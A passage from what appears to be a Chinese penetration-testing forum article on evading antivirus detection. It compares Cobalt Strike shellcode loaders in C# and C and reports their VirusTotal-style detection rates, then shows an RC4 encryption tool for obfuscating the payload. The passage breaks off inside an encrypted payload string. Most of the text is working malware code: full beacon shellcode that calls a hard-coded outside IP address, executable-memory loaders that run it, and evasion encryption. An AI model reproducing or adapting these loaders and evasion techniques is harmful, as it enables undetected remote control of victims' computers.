问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
各种免杀思路分析
渗透测试
# 各种免杀思路分析 ## 写在前面 在前面一篇powershell文章中,我已经对其powershell免杀思路分析了,接下来我将介绍其他常用的免杀思路,在内网渗透中,免杀技术显得格外重要,在免杀的...
各种免杀思路分析 ======== 写在前面 ---- 在前面一篇powershell文章中,我已经对其powershell免杀思路分析了,接下来我将介绍其他常用的免杀思路,在内网渗透中,免杀技术显得格外重要,在免杀的学习中,经常陷入一个误区,按照教程复现一遍,甚至不知道别人再讲什么,只知道可以免杀,而一旦别人的免杀技巧给查杀,自己对其免杀思路就束手无策,而正所谓授人以鱼不如授人以渔,接下来将从各个思路进行分析,当然可能思路有些跳跃,但别急后面我会画一个图进行总结,文章可能很长,请耐心看。 **免杀方式主要考虑的问题:** 1、免杀工具执行的条件 2、文件的大小 3、是否能够正常使用(这里是能否正常上线) 上一篇powershell免杀思路分析地址如下: <https://forum.butian.net/share/936> 语言的选择 ----- 使用CS生成C#的payload,使用Visual Studio 2017直接编译 ```php using System; using System.Runtime.InteropServices; namespace TCPMeterpreterProcess { class Program { static void Main(string[] args) { // native function’s compiled code // generated with metasploit byte[] shellcode = new byte[799] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x71, 0x17, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x40, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 0xff, 0x2f, 0x64, 0x56, 0x52, 0x50, 0x00, 0x35, 0x0f, 0xe8, 0x63, 0x49, 0x81, 0x57, 0xa6, 0x1f, 0x01, 0x92, 0xc2, 0x44, 0xdb, 0x17, 0x91, 0x57, 0x71, 0x61, 0xbe, 0xc0, 0x48, 0x6c, 0x45, 0xd1, 0x98, 0x27, 0x18, 0xcd, 0x4b, 0xef, 0x5e, 0x17, 0x35, 0xa9, 0xc8, 0x73, 0x6d, 0x1f, 0x7c, 0x40, 0x8d, 0xbd, 0xf8, 0x14, 0x28, 0xc8, 0x86, 0xad, 0xc5, 0xe0, 0xfc, 0xe2, 0x8d, 0x59, 0x02, 0xe7, 0x00, 0xb4, 0xaa, 0xdd, 0x52, 0xba, 0xb9, 0xb4, 0x85, 0xe9, 0x55, 0x2a, 0x65, 0xf3, 0x22, 0xf6, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x34, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x37, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x35, 0x2e, 0x31, 0x3b, 0x20, 0x2e, 0x4e, 0x45, 0x54, 0x20, 0x43, 0x4c, 0x52, 0x20, 0x32, 0x2e, 0x30, 0x2e, 0x35, 0x30, 0x37, 0x32, 0x37, 0x3b, 0x20, 0x49, 0x6e, 0x66, 0x6f, 0x50, 0x61, 0x74, 0x68, 0x2e, 0x32, 0x29, 0x0d, 0x0a, 0x00, 0x9b, 0x0e, 0x83, 0xb9, 0x92, 0xe5, 0x66, 0x91, 0x12, 0xc8, 0x7f, 0x1f, 0x84, 0x07, 0x1d, 0xf0, 0x76, 0xb1, 0xe8, 0x74, 0x8b, 0x01, 0xd1, 0x64, 0xee, 0xcb, 0xed, 0x71, 0x8e, 0xc8, 0xc4, 0x8e, 0x59, 0x35, 0x74, 0x38, 0x1e, 0x66, 0x3a, 0x75, 0x39, 0x31, 0x01, 0x93, 0x0e, 0x7c, 0xa5, 0xc3, 0x96, 0xca, 0xa8, 0x62, 0xc0, 0x35, 0x52, 0x96, 0xfd, 0x52, 0x8e, 0x66, 0xac, 0xa5, 0x59, 0xc1, 0x6b, 0xaf, 0xd4, 0x8f, 0xa0, 0x2d, 0x79, 0x6f, 0x0e, 0x45, 0x0a, 0xb3, 0xce, 0xe1, 0xb1, 0xd4, 0x28, 0xfc, 0x90, 0x67, 0x65, 0x96, 0xb5, 0xa7, 0x46, 0xf0, 0x35, 0x26, 0x46, 0x37, 0x06, 0x30, 0x12, 0xbf, 0x1a, 0x59, 0x7b, 0xf6, 0xea, 0xca, 0x6b, 0x8c, 0x57, 0xdc, 0x0e, 0x17, 0x2c, 0x0c, 0xa2, 0x78, 0xb5, 0x5e, 0x57, 0x56, 0x5b, 0x54, 0xd7, 0xf9, 0x2b, 0xed, 0x08, 0x47, 0xba, 0xca, 0xa6, 0xd9, 0x41, 0xb4, 0x72, 0x0f, 0x3b, 0xba, 0x7f, 0x95, 0x56, 0x30, 0x21, 0xe5, 0x63, 0xe3, 0xaa, 0x9c, 0xd8, 0xd3, 0xbc, 0x41, 0xb8, 0x34, 0xd3, 0xbf, 0x37, 0xc6, 0x16, 0xe9, 0x65, 0x7a, 0x66, 0x06, 0x06, 0xda, 0x78, 0x8b, 0x72, 0x43, 0x44, 0xe9, 0xb1, 0x94, 0x67, 0x37, 0x1b, 0x2c, 0xe6, 0x49, 0x0a, 0xf3, 0x92, 0x71, 0x89, 0x8b, 0xae, 0xb0, 0x91, 0xcb, 0x1a, 0xc8, 0xd3, 0xb7, 0x5a, 0x81, 0xfe, 0x30, 0x13, 0xcb, 0x7f, 0x40, 0xa8, 0x9c, 0x44, 0x08, 0xf3, 0xd1, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x34, 0x37, 0x2e, 0x31, 0x31, 0x33, 0x2e, 0x32, 0x31, 0x37, 0x2e, 0x31, 0x32, 0x38, 0x00, 0x12, 0x34, 0x56, 0x78 };//生成的shellcode UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; // prepare data IntPtr pinfo = IntPtr.Zero; // execute native code hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); WaitForSingleObject(hThread, 0xFFFFFFFF); } private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); [DllImport("kernel32")] private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType); [DllImport("kernel32")] private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId ); [DllImport("kernel32")] private static extern bool CloseHandle(IntPtr handle); [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds ); [DllImport("kernel32")] private static extern IntPtr GetModuleHandle( string moduleName ); [DllImport("kernel32")] private static extern UInt32 GetProcAddress( IntPtr hModule, string procName ); [DllImport("kernel32")] private static extern UInt32 LoadLibrary( string lpFileName ); [DllImport("kernel32")] private static extern UInt32 GetLastError(); } } ``` 免杀率为31/67 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-f73582c324ff0fe11293f90ecd9767479ce968a0.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-f73582c324ff0fe11293f90ecd9767479ce968a0.png) 使用CS生成C语言的payload,使用Visual Studio 2017直接编译 ```php #include <Windows.h> #include <stdio.h> #include <string.h> #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口 unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x71\x17\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x4a\x77\x5a\x41\x00\x7c\x09\x73\x75\xab\xe8\xad\xa6\x70\xa7\xe9\x39\x8b\xe3\x13\x32\xc0\x34\x56\xc5\x9f\x96\x4a\xfc\x85\x37\xd5\x50\x37\x8e\x24\x8c\x26\x38\x41\x72\x83\xd3\x5c\x05\xba\x96\xea\x3f\x56\x17\xdc\x96\xe4\xcd\xa7\xe9\x32\x50\xf1\x6d\xa2\xd1\x51\x47\xc4\x4c\xc6\x97\xc4\xd7\xf6\x30\x98\xbc\x10\x0a\xab\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x37\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x35\x2e\x31\x3b\x20\x2e\x4e\x45\x54\x34\x2e\x30\x43\x3b\x20\x2e\x4e\x45\x54\x34\x2e\x30\x45\x3b\x20\x2e\x4e\x45\x54\x20\x43\x4c\x52\x20\x32\x2e\x30\x2e\x35\x30\x37\x32\x37\x29\x0d\x0a\x00\x42\xbc\xed\x0a\x82\xf0\x67\xba\xc1\xdc\x89\x38\xeb\x33\x9e\x34\x70\x58\xaf\xf7\xdd\x1a\x5d\x99\x83\x29\x8f\xf3\x33\x28\x82\x81\x51\x91\x41\x5d\x5f\xbe\x41\x56\x6b\x18\x39\xa5\x61\xa2\x9b\xe9\xd9\x3a\xa0\xf0\xbf\x8b\x40\xd7\x4e\x4b\x90\xe8\xa7\xf0\xbc\x70\xe6\x79\x9e\x70\x9a\xdb\x1c\x21\x81\xc4\x9d\xb1\xc9\x5a\xdd\xab\xb4\x8f\x5b\x2a\x0d\x0e\x33\x64\xa8\x96\xca\xd4\xfe\x9b\x77\xb2\x87\x17\x31\xfe\x5f\x98\xa3\xae\x69\x30\x5a\x76\xc4\x24\x62\x30\x39\x31\x59\x35\xd6\xab\xde\xb0\xb2\x8a\x8a\xa1\xdc\xd8\x24\xd8\x48\xab\x43\x8d\x6c\x58\x2c\xb0\x59\x97\xa5\xa1\xc1\x8d\x25\x4d\xdd\xd4\x8c\x31\xd6\x61\x21\xe5\xf0\xeb\x52\x28\xfa\xae\x7e\x4f\xa0\x46\x73\xa0\x54\x51\xd3\x23\x73\xc8\xb0\x22\x6b\x87\x9c\x0f\x8e\x14\xdb\x81\x6d\x4b\x87\x33\xd1\x32\x50\xf8\x50\x6b\x1f\xcc\x01\x73\x89\x38\xd8\x72\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x34\x37\x2e\x31\x31\x33\x2e\x32\x31\x37\x2e\x31\x32\x38\x00\x12\x34\x56\x78"; main() { char* Memory; Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(Memory, buf, sizeof(buf)); ((void(*)())Memory)(); } ``` 免杀率为37/67 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a42e2b118d9bb75378699073c9d3d62f9d5e7fce.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a42e2b118d9bb75378699073c9d3d62f9d5e7fce.png) 从上述现象说明了什么问题?说明不同语言生成exe免杀率不相同,免杀率跟语言选择有关。 编码加密混淆 ------ 对C#生成的payload利用以下脚本进行加密 ```php using System; using System.Collections.Generic; using System.IO; using System.Linq; using System.Security.Cryptography; using System.Text; using System.Threading.Tasks; using System.Reflection; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; namespace Payload_Encrypt_Maker { class Program { // 加密密钥,可以更改,加解密源码中保持KEY一致就行 static byte[] KEY = { 0x33, 0x11, 0x33, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33, 0x00, 0x33, 0x01, 0x33, 0x33, 0x00, 0x00 }; static byte[] IV = { 0x00, 0xcc, 0x00, 0x00, 0x00, 0xcc }; static byte[] payload = { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x71, 0x17, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x40, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 0xff, 0x2f, 0x64, 0x56, 0x52, 0x50, 0x00, 0x35, 0x0f, 0xe8, 0x63, 0x49, 0x81, 0x57, 0xa6, 0x1f, 0x01, 0x92, 0xc2, 0x44, 0xdb, 0x17, 0x91, 0x57, 0x71, 0x61, 0xbe, 0xc0, 0x48, 0x6c, 0x45, 0xd1, 0x98, 0x27, 0x18, 0xcd, 0x4b, 0xef, 0x5e, 0x17, 0x35, 0xa9, 0xc8, 0x73, 0x6d, 0x1f, 0x7c, 0x40, 0x8d, 0xbd, 0xf8, 0x14, 0x28, 0xc8, 0x86, 0xad, 0xc5, 0xe0, 0xfc, 0xe2, 0x8d, 0x59, 0x02, 0xe7, 0x00, 0xb4, 0xaa, 0xdd, 0x52, 0xba, 0xb9, 0xb4, 0x85, 0xe9, 0x55, 0x2a, 0x65, 0xf3, 0x22, 0xf6, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x34, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x37, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x35, 0x2e, 0x31, 0x3b, 0x20, 0x2e, 0x4e, 0x45, 0x54, 0x20, 0x43, 0x4c, 0x52, 0x20, 0x32, 0x2e, 0x30, 0x2e, 0x35, 0x30, 0x37, 0x32, 0x37, 0x3b, 0x20, 0x49, 0x6e, 0x66, 0x6f, 0x50, 0x61, 0x74, 0x68, 0x2e, 0x32, 0x29, 0x0d, 0x0a, 0x00, 0x9b, 0x0e, 0x83, 0xb9, 0x92, 0xe5, 0x66, 0x91, 0x12, 0xc8, 0x7f, 0x1f, 0x84, 0x07, 0x1d, 0xf0, 0x76, 0xb1, 0xe8, 0x74, 0x8b, 0x01, 0xd1, 0x64, 0xee, 0xcb, 0xed, 0x71, 0x8e, 0xc8, 0xc4, 0x8e, 0x59, 0x35, 0x74, 0x38, 0x1e, 0x66, 0x3a, 0x75, 0x39, 0x31, 0x01, 0x93, 0x0e, 0x7c, 0xa5, 0xc3, 0x96, 0xca, 0xa8, 0x62, 0xc0, 0x35, 0x52, 0x96, 0xfd, 0x52, 0x8e, 0x66, 0xac, 0xa5, 0x59, 0xc1, 0x6b, 0xaf, 0xd4, 0x8f, 0xa0, 0x2d, 0x79, 0x6f, 0x0e, 0x45, 0x0a, 0xb3, 0xce, 0xe1, 0xb1, 0xd4, 0x28, 0xfc, 0x90, 0x67, 0x65, 0x96, 0xb5, 0xa7, 0x46, 0xf0, 0x35, 0x26, 0x46, 0x37, 0x06, 0x30, 0x12, 0xbf, 0x1a, 0x59, 0x7b, 0xf6, 0xea, 0xca, 0x6b, 0x8c, 0x57, 0xdc, 0x0e, 0x17, 0x2c, 0x0c, 0xa2, 0x78, 0xb5, 0x5e, 0x57, 0x56, 0x5b, 0x54, 0xd7, 0xf9, 0x2b, 0xed, 0x08, 0x47, 0xba, 0xca, 0xa6, 0xd9, 0x41, 0xb4, 0x72, 0x0f, 0x3b, 0xba, 0x7f, 0x95, 0x56, 0x30, 0x21, 0xe5, 0x63, 0xe3, 0xaa, 0x9c, 0xd8, 0xd3, 0xbc, 0x41, 0xb8, 0x34, 0xd3, 0xbf, 0x37, 0xc6, 0x16, 0xe9, 0x65, 0x7a, 0x66, 0x06, 0x06, 0xda, 0x78, 0x8b, 0x72, 0x43, 0x44, 0xe9, 0xb1, 0x94, 0x67, 0x37, 0x1b, 0x2c, 0xe6, 0x49, 0x0a, 0xf3, 0x92, 0x71, 0x89, 0x8b, 0xae, 0xb0, 0x91, 0xcb, 0x1a, 0xc8, 0xd3, 0xb7, 0x5a, 0x81, 0xfe, 0x30, 0x13, 0xcb, 0x7f, 0x40, 0xa8, 0x9c, 0x44, 0x08, 0xf3, 0xd1, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x34, 0x37, 0x2e, 0x31, 0x31, 0x33, 0x2e, 0x32, 0x31, 0x37, 0x2e, 0x31, 0x32, 0x38, 0x00, 0x12, 0x34, 0x56, 0x78 }; // 替换成CS生成的shellcode private static class Encryption_Class { public static string Encrypt(string key, string data) { Encoding unicode = Encoding.Unicode; return Convert.ToBase64String(Encrypt(unicode.GetBytes(key), unicode.GetBytes(data))); } public static byte[] Encrypt(byte[] key, byte[] data) { return EncryptOutput(key, data).ToArray(); } private static byte[] EncryptInitalize(byte[] key) { byte[] s = Enumerable.Range(0, 256) .Select(i => (byte)i) .ToArray(); for (int i = 0, j = 0; i < 256; i++) { j = (j + key[i % key.Length] + s[i]) & 255; Swap(s, i, j); } return s; } private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data) { byte[] s = EncryptInitalize(key); int i = 0; int j = 0; return data.Select((b) => { i = (i + 1) & 255; j = (j + s[i]) & 255; Swap(s, i, j); return (byte)(b ^ s[(s[i] + s[j]) & 255]); }); } private static void Swap(byte[] s, int i, int j) { byte c = s[i]; s[i] = s[j]; s[j] = c; } } static void Main(string[] args) { byte[] result = Encryption_Class.Encrypt(KEY, payload); int b = 0; for (int i = 0; i < result.Length; i++) { b++; if (i == result.Length + 1) { Console.Write(result[i].ToString()); } if (i != result.Length) { Console.Write(result[i].ToString() + ","); } } } } } ``` 加密后的shellcode [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-3f49466db2b42e80c09cad9565a6a70f8a84e4cb.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-3f49466db2b42e80c09cad9565a6a70f8a84e4cb.png) 将上述payload复制到下列脚本,并编译 ```php using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Runtime.InteropServices; using System.Threading; using System.Reflection; using System.Runtime.CompilerServices; namespace NativePayload_Reverse_tcp { public class Program { public static void Main() { Shellcode.Exec(); } } class Shellcode { public static void Exec() { string Payload_Encrypted; Payload_Encrypted = "131,215,96,95,43,231,85,88,206,177,138,103,143,234,214,9,118,88,196,6,207,13,235,159,144,17,51,94,157,203,23,123,124,244,242,200,206,148,146,88,44,31,218,145,12,15,87,150,191,8,204,84,241,157,104,236,226,5,206,146,20,70,94,10,97,110,70,63,200,142,250,176,122,127,27,40,133,220,235,169,234,103,101,217,140,182,29,152,136,22,180,165,87,68,94,139,149,244,47,34,205,18,134,172,169,158,234,66,71,56,234,207,238,34,171,99,223,185,131,61,185,140,183,111,149,43,193,9,53,137,179,196,121,191,28,232,49,137,218,223,85,67,27,154,200,230,3,213,222,37,29,14,42,255,248,122,10,137,136,200,253,209,55,15,254,85,52,91,91,14,214,89,17,81,32,210,14,143,200,40,85,244,104,242,217,221,48,152,169,107,119,78,198,92,150,66,19